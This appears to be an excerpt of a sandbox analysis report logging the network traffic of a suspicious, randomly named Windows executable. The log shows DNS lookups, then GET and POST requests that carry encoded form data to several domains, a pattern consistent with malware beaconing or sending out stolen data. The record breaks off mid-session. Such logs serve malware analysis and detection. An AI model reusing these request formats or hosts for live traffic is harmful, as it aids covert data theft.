Nov 14, 2024 15:41:49.685539961 CET | 1.1.1.1 | 192.168.2.5 | 0xffa7 | No error (0) | bio-thymus.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:04.405814886 CET | 1.1.1.1 | 192.168.2.5 | 0xbb8e | No error (0) | www.wukong.college |  | 47.52.221.8 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:04.405877113 CET | 1.1.1.1 | 192.168.2.5 | 0xbb8e | No error (0) | www.wukong.college |  | 47.52.221.8 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:18.358532906 CET | 1.1.1.1 | 192.168.2.5 | 0xfec7 | No error (0) | www.vehiculargustav.click | ppp84k45ss7ehy8ypic5x.limelightcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:42:18.358532906 CET | 1.1.1.1 | 192.168.2.5 | 0xfec7 | No error (0) | ppp84k45ss7ehy8ypic5x.limelightcdn.com |  | 23.106.59.18 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:32.006277084 CET | 1.1.1.1 | 192.168.2.5 | 0xfef1 | No error (0) | www.bulls777.pro | bulls777.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:42:40.249519110 CET | 1.1.1.1 | 192.168.2.5 | 0x981b | No error (0) | www.yushaliu.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:54.150876045 CET | 1.1.1.1 | 192.168.2.5 | 0x66a9 | No error (0) | www.marketprediction.app | marketprediction.app |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:42:54.150876045 CET | 1.1.1.1 | 192.168.2.5 | 0x66a9 | No error (0) | marketprediction.app |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:42:54.150876045 CET | 1.1.1.1 | 192.168.2.5 | 0x66a9 | No error (0) | marketprediction.app |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:43:07.652375937 CET | 1.1.1.1 | 192.168.2.5 | 0xe45c | Name error (3) | www.066bet.xyz | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49803 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:39:39.945863962 CET | 390 | OUT | GET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:39:40.575146914 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 14 Nov 2024 14:39:40 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49881 | 217.70.184.50 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:39:55.714243889 CET | 639 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuT2qkN4bOp8sLBNrJwjpaMjq5mb9NKqqMTUPgoKQ=
Nov 14, 2024 15:39:56.510382891 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 14 Nov 2024 14:39:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49890 | 217.70.184.50 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:39:58.248111010 CET | 659 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDGB2I16baLlJ3fQ2dGdb/tq/x2+qUhH0QYRe63Q
Nov 14, 2024 15:39:59.079838037 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 14 Nov 2024 14:39:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49905 | 217.70.184.50 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:00.802840948 CET | 1676 | OUT | POST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 78 63 6b 42 56 57 6a 37 71 5a 2f 61 74 6e 63 42 31 76 51 2f 75 75 4d 66 72 6c 63 70 6b 47 71 35 33 55 2b 71 6d 38 31 55 4d 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 38 48 38 76 79 4c 4c 48 41 4d 46 6a 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 [TRUNCATED]
Data Ascii: W638b4U= [TRUNCATED]
Nov 14, 2024 15:40:01.654900074 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49917 | 217.70.184.50 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:03.401639938 CET | 382 | OUT | GET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:40:04.188254118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-b1d227afc1b64e6c801d7bbda9206dfd';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 62 31 64 32 32 37 61 66 63 31 62 36 34 65 36 63 38 30 31 64 37 62 62 64 61 39 32 30 36 64 66 64 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-b1d227afc1b64e6c801d7bbda9206dfd';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
Nov 14, 2024 15:40:04.188272953 CET | 1236 | IN | Data Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                                  Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
Nov 14, 2024 15:40:04.188283920 CET | 166 | IN | Data Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                                  Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49952 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:09.389461994 CET | 663 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 42 6c 2b 49 79 39 4d 47 33 35 58 77 43 65 63 33 7a 56 46 43 4c 71 56 6a 44 59 65 77 56 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CBl+Iy9MG35XwCec3zVFCLqVjDYewVHkdks6XJ4=
Nov 14, 2024 15:40:10.018647909 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:09 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: e41a7048-b535-43f3-9289-7d2857d15f08
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=e41a7048-b535-43f3-9289-7d2857d15f08; expires=Thu, 14 Nov 2024 14:55:09 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:10.018678904 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTQxYTcwNDgtYjUzNS00M2YzLTkyODktN2QyODU3ZDE1ZjA4IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49966 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:11.940773010 CET | 683 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 47 74 7a 51 51 70 68 6c 6d 4e 48 48 38 4b 4a 65 76 67 64 44 48 4a 44 54 32 76 59 6a 4d 69 51 43 4c 71 74 47 4f 4e
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrGtzQQphlmNHH8KJevgdDHJDT2vYjMiQCLqtGON
Nov 14, 2024 15:40:12.583775043 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:12 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 0dce5f4f-2ba4-4a46-a4a3-2d939a352d11
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=0dce5f4f-2ba4-4a46-a4a3-2d939a352d11; expires=Thu, 14 Nov 2024 14:55:12 GMT; path=/
                                                                                                                                                  connection: close
